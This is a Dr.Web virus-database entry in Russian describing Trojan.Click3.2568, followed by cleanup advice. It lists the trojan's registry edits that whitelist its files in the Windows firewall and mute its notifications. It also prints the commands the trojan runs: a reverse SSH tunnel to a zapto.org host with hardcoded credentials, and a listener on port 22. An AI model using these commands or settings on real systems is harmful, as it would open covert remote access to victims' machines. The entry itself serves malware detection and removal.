Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Click3.2568

Добавлен в вирусную базу Dr.Web: 2013-10-22

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
  • %HOMEPATH%\Start Menu\Programs\Startup\chrome.lnk
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Microsoft.SDK\nservices.exe' = 'C:\Microsoft.SDK\nservices.exe:*:Enabled:nservices'
  • [<HKLM>\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Microsoft.SDK\System.exe' = 'C:\Microsoft.SDK\System.exe:*:Enabled:System'
  • [<HKLM>\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Microsoft.SDK\nservices.exe' = 'C:\Microsoft.SDK\nservices.exe:*:Enabled:nservices'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Microsoft.SDK\System.exe' = 'C:\Microsoft.SDK\System.exe:*:Enabled:System'
Создает и запускает на исполнение:
  • 'C:\Microsoft.SDK\System.exe' -ssh -R 36455:127.0.0.2:22 httpsnew3.zapto.org -l 10pro -pw 2n16122N
  • 'C:\Microsoft.SDK\nservices.exe' -d -t -l -e0.0.0.0 -i127.0.0.2 -p22 -a
  • '%TEMP%\is-26HS1.tmp\<Имя вируса>.tmp' /SL5="$30092,348961,166912,<Полный путь к вирусу>"
Запускает на исполнение:
  • '<SYSTEM32>\wscript.exe' "C:\Microsoft.SDK\nservices.vbe"
  • '%WINDIR%\regedit.exe' /s "C:\Microsoft.SDK\ssss.reg"
  • '%PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE' http://us#.com/uri/
Изменения в файловой системе:
Создает следующие файлы:
  • C:\Microsoft.SDK\is-C25AH.tmp
  • C:\Microsoft.SDK\is-L3NAA.tmp
  • C:\Microsoft.SDK\unins000.dat
  • <LS_APPDATA>\PUTTY.RND
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\uri[1]
  • C:\Microsoft.SDK\is-CNFBN.tmp
  • %TEMP%\is-G3BNL.tmp\_isetup\_shfoldr.dll
  • %TEMP%\is-26HS1.tmp\<Имя вируса>.tmp
  • C:\Microsoft.SDK\is-1BOB1.tmp
  • C:\Microsoft.SDK\is-7P9RL.tmp
  • C:\Microsoft.SDK\is-QEA73.tmp
Удаляет следующие файлы:
  • %TEMP%\is-26HS1.tmp\<Имя вируса>.tmp
  • %TEMP%\is-G3BNL.tmp\_isetup\_shfoldr.dll
  • C:\Microsoft.SDK\nservices.vbe
Перемещает следующие файлы:
  • C:\Microsoft.SDK\is-CNFBN.tmp в C:\Microsoft.SDK\nservices.vbe
  • C:\Microsoft.SDK\is-L3NAA.tmp в C:\Microsoft.SDK\ssss.reg
  • C:\Microsoft.SDK\is-C25AH.tmp в C:\Microsoft.SDK\System.exe
  • C:\Microsoft.SDK\is-1BOB1.tmp в C:\Microsoft.SDK\unins000.exe
  • C:\Microsoft.SDK\is-QEA73.tmp в C:\Microsoft.SDK\nservices.vbe
  • C:\Microsoft.SDK\is-7P9RL.tmp в C:\Microsoft.SDK\nservices.exe
Сетевая активность:
Подключается к:
  • 'ht####ew3.zapto.org':22
  • 'us#.com':80
  • 'localhost':1038
TCP:
Запросы HTTP GET:
  • us#.com/uri/
UDP:
  • DNS ASK ht####ew3.zapto.org
  • DNS ASK us#.com
Другое:
Ищет следующие окна:
  • ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
  • ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
  • ClassName: '' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
  • ClassName: 'RegEdit_RegEdit' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке